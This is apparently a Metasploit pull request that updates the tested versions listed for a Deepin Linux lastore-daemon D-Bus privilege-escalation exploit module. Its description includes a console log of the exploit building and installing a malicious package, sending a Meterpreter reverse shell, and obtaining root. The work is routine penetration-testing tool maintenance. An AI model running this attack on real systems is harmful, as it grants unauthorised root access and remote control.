### PR TITLE
Update lastore_daemon_dbus_priv_esc tested versions

### DIFF
--- a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md
@@ -7,7 +7,7 @@
 
 ## Vulnerable Application
 
-  The `lastore-daemon` D-Bus configuration on Deepin Linux 15.5 permits any
+  The `lastore-daemon` D-Bus configuration on Deepin Linux permits any
   user in the `sudo` group to install arbitrary system packages without
   providing a password, resulting in code execution as root. By default,
   the first user created on the system is a member of the `sudo` group.
@@ -30,8 +30,10 @@
   </policy>
   ```
 
-  This module has been tested successfully with lastore-daemon version
-  0.9.53-1 on Deepin Linux 15.5 (x64).
+  This module has been tested successfully with lastore-daemon versions:
+
+  * 0.9.53-1 on Deepin Linux 15.5 (x64)
+  * 0.9.66-1 on Deepin Linux 15.7 (x64)
 
   Deepin Linux is available here:
 

--- a/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb
+++ b/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb
@@ -18,13 +18,14 @@ class MetasploitModule < Msf::Exploit::Local
         This module attempts to gain root privileges on Deepin Linux systems
         by using lastore-daemon to install a package.
 
-        The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
+        The lastore-daemon D-Bus configuration on Deepin Linux permits any
         user in the sudo group to install arbitrary system packages without
         providing a password, resulting in code execution as root. By default,
         the first user created on the system is a member of the sudo group.
 
-        This module has been tested successfully with lastore-daemon version
-        0.9.53-1 on Deepin Linux 15.5 (x64).
+        This module has been tested successfully with lastore-daemon versions
+        0.9.53-1 on Deepin Linux 15.5 (x64); and
+        0.9.66-1 on Deepin Linux 15.7 (x64).
       },
       'License'        => MSF_LICENSE,
       'Author'         =>


### PR DESCRIPTION
Update `lastore_daemon_dbus_priv_esc` module tested versions.

```
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.196:4444 
[+] lastore-daemon is installed
[+] dpkg-deb is installed
[+] dbus-send is installed
[+] User is permitted to install packages
[*] Building package...
[*] Creating '/tmp/.Rtebwm3IGr/DEBIAN' directory
[*] Writing '/tmp/.Rtebwm3IGr/DEBIAN/control' (98 bytes) ...
[*] Writing '/tmp/.Rtebwm3IGr/DEBIAN/postinst' (29 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.nPVHj5ZrFWe' (249 bytes) ...
[*] Installing package...
method return time=1538686233.940189 sender=:1.64 -> destination=:1.71 serial=72 reply_serial=2
   object path "/com/deepin/lastore/Job2install"
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.16.191.142
[+] Deleted /tmp/.Rtebwm3IGr/DEBIAN/control
[+] Deleted /tmp/.Rtebwm3IGr/DEBIAN/postinst
[+] Deleted /tmp/.nPVHj5ZrFWe
[+] Deleted /tmp/.Rtebwm3IGr/DEBIAN
[*] Removing package...
method return time=1538686249.603270 sender=:1.64 -> destination=:1.72 serial=148 reply_serial=2
   object path "/com/deepin/lastore/Job3remove"

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
smeterpreter > sysinfo
Computer     : 172.16.191.142
OS           : Deepin 15.7 (Linux 4.15.0-29deepin-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
